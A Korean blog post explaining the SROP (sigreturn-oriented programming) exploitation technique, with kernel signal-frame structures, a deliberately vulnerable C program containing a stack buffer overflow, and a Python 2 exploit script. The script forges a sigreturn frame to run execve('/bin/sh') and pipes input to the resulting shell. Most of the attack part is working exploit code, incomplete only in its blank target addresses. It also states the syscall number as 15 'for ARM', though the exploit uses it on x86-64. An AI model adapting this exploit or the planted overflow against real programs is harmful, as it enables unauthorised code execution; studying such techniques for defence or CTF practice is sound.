


SROP - Sigreturn Oriented Programming

유뱃 2016. 2. 11. 03:11


SROP - Sigreturn Oriented Programming


SROP는 가젯이 충분하지 않은 상황에서 int $0x80 가젯과 eax 레지스터 컨트롤이 가능할 때 쓰는 기법이다.


SROP는 Sigreturn Oriented Programming의 약자로, sigreturn을 이용한 기법이다.


sigreturn system call은 signal을 받은 프로세스가 커널 모드로 동작한 다음 유저 모드로 돌아올 때 사용하는 시스템콜이다.


sigreturn syscall number는 arm 기준 15이다.



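/*
 * Frame the kernel places on the user stack before running a signal
 * handler and pops back from rsp on rt_sigreturn. Excerpted from the
 * Linux kernel headers; the original line-number gutter and the split
 * comment delimiters of the pasted listing have been removed so this is
 * valid C again. The fields after pretcode are what an SROP payload
 * forges (see the layout table below).
 */
struct rt_sigframe {
    char __user *pretcode;      /* address the signal handler returns to */
    struct ucontext uc;         /* saved registers, signal stack and mask */
    struct siginfo info;
    /* fp state follows here */
};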
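/*
 * User context embedded in rt_sigframe. Excerpted from the Linux kernel
 * headers with the pasted line-number gutter removed. uc_mcontext holds
 * the register image that rt_sigreturn loads back, so everything in it
 * comes from user-writable stack memory.
 */
struct ucontext {
    unsigned long uc_flags;
    struct ucontext *uc_link;
    stack_t uc_stack;                   /* signal alternate stack (ss_sp/ss_flags/ss_size) */
    struct sigcontext uc_mcontext;      /* register image restored on sigreturn */
    sigset_t uc_sigmask;                /* mask last for extensibility */
};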
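/*
 * Alternate signal stack descriptor (uc_stack above). Excerpted from the
 * Linux kernel headers with the pasted line-number gutter removed. In the
 * frame layout below these are the three words following uc_link.
 */
typedef struct sigaltstack {
    void __user *ss_sp;
    int ss_flags;
    size_t ss_size;
} stack_t;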
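/*
 * x86-64 register image saved at signal delivery and restored by
 * rt_sigreturn. Excerpted from the Linux kernel headers; the pasted
 * line-number gutter and broken comment delimiters have been removed.
 *
 * Because the whole structure sits on the user stack, rsp, rip, rax and
 * the other general-purpose registers are taken from memory the process
 * itself can write -- which is the property SROP relies on. The exploit
 * below fills exactly these fields, in this order.
 */
struct sigcontext {
    __u64 r8;
    __u64 r9;
    __u64 r10;
    __u64 r11;
    __u64 r12;
    __u64 r13;
    __u64 r14;
    __u64 r15;
    __u64 rdi;
    __u64 rsi;
    __u64 rbp;
    __u64 rbx;
    __u64 rdx;
    __u64 rax;
    __u64 rcx;
    __u64 rsp;
    __u64 rip;
    __u64 eflags;           /* RFLAGS */
    __u16 cs;               /* cs/gs/fs/__pad0 share one 8-byte slot */
    __u16 gs;
    __u16 fs;
    __u16 __pad0;
    __u64 err;
    __u64 trapno;
    __u64 oldmask;
    __u64 cr2;
    struct _fpstate __user *fpstate;    /* zero when no FPU context */
#ifdef __ILP32__
    __u32 __fpstate_pad;
#endif
    __u64 reserved1[8];
};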


rt_sigframe 구조체의 순서대로 현재 rsp에서 pop한다.


uc_flags <- rsp
& uc_link
& ss_sp (stack_t)
ss_flags |
ss_size v
r8 (struct sigcontext)
r9 |
r10 |
r11 |
r12 |
r13 |
r14 |
r15 |
rdi |
rsi |
rbp |
rbx |
rdx |
rax |
rcx |
rsp |
rip |
eflags |
cs / gs / fs |
err |
trapno |
oldmask |
cr2 |
& fpstate |
reserved1 [0] |
reserved1 [1] |
reserved1 [2] |
reserved1 [3] |
reserved1 [4] |
reserved1 [5] |
reserved1 [6] |
reserved1 [7] v
uc_sigmask (sigset_t)





problem.c


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


/*
 * Deliberately vulnerable target for the SROP write-up above.
 *
 * buf holds 16 bytes but read() may write up to 1000 bytes into it, so
 * longer input runs past the buffer into the rest of the stack frame
 * (saved rbp, return address, ...). That overflow is the only bug the
 * exploit needs. read() is also called without a prototype: the includes
 * above do not declare it (<unistd.h> does).
 *
 * `a` is never used. Its value 0x50f is presumably chosen so that the
 * immediate bytes 0f 05 (a `syscall` instruction) appear inside main's
 * code -- TODO confirm against the compiled binary.
 *
 * Fix, if this were not a demo: `read(0, buf, sizeof buf)`.
 */
int main(int argc,char *argv[])
{
    int a = 0x50f;      /* unused; see note above */
    char buf[16];       /* 16-byte stack buffer */
    read(0,buf,1000);   /* up to 1000 bytes into 16: stack overflow; return value unchecked */
}




exploit.py


from struct import *

from time import *

from subprocess import *


p = lambda x : pack("<Q",x)  # one little-endian 64-bit word (x86-64 frame layout)

# Target-specific addresses. The author left them blank, so the script does
# not even parse until they are filled in for the binary under test.
syscall =   # address of a `syscall` instruction in the target
bss =       # writable .bss address reused as the fake stack / frame
read =      # address the overwritten return lands on to trigger another read()

#sigreturn number 15

# Python 2 script: payloads are str and raw_input() is used below.
# Under Python 3 pack() returns bytes and these concatenations fail.

# Stage 1: overflow the 16-byte buf. The next two words presumably replace
# the saved rbp (bss+0x10) and the return address (`read`), so the
# following read() writes into .bss instead of the stack.
payload = ""
payload += "a"*16
payload += p(bss+0x10)
payload += p(read)

# Stage 2: bytes written at bss. The leading "/bin/sh\x00" is what rdi in
# the frame below points at; the next rbp/`read` pair re-enters read() one
# more time before the ret that reaches p(syscall).
payload2 = ""
payload2 += "/bin/sh\x00"*2
payload2 += p(bss+0x10+0x10+0x8+0x8)    # saved rbp for the next return
payload2 += p(read)                     # return address: read() again
payload2 += "a"*24                      # filler up to the next return-address slot
payload2 += p(syscall)                  # ret target: `syscall` (rax is 15 at this point, see the 15-byte write below)
# From here on the bytes are the rt_sigframe the kernel pops from rsp, in
# the field order of the layout table above.
payload2 += "a"*40                      # uc_flags, uc_link, ss_sp, ss_flags, ss_size
payload2 += p(0)*8                      # r8 .. r15
payload2 += p(bss) #rdi -> "/bin/sh"
payload2 += p(0) #rsi
payload2 += p(0) #rbp
payload2 += p(0) #rbx
payload2 += p(0) #rdx
payload2 += p(0x3b) #rax: execve syscall number
payload2 += p(0) #rcx
payload2 += p(0) #rsp
payload2 += p(syscall) #rip
payload2 += p(0) #eflag
payload2 += p(0x33) #csgsfs: cs=0x33 (x86-64 user code segment), gs/fs/pad zero
payload2 += "A"*32                      # err, trapno, oldmask, cr2
payload2 += p(0)                        # fpstate (NULL: no FPU context)

# shell=True only so that "~" expands; stdout is inherited.
ex = Popen("~/file",shell=True,stdin=PIPE)

ex.stdin.write(payload)
sleep(1)                    # let the target consume one read() before the next stage
ex.stdin.write(payload2)
sleep(1)
ex.stdin.write("a"*15)      # 15 bytes: read() returns 15, which is presumably still in rax when the ret hits p(syscall)
sleep(1)

# Relay the user's lines to the spawned process's stdin.
while True:
    t = raw_input()
    ex.stdin.write(t+'\n')





참고자료

https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CB4QFjAAahUKEwj9nOnO7-fIAhUHG6YKHWwdCG8&url=http%3A%2F%2Ferr0rless313.tistory.com%2Fattachment%2Fcfile23.uf%402379F14B54DF08BC083B9C.pdf&usg=AFQjCNHfSE2JFSMkPnsGQZVSDjfCLzZbxA&sig2=CAfKcMnH0Jn63saCrk2yMg&bvm=bv.106130839,d.dGY

http://inaz2.hatenablog.com/entry/2014/07/30/021123

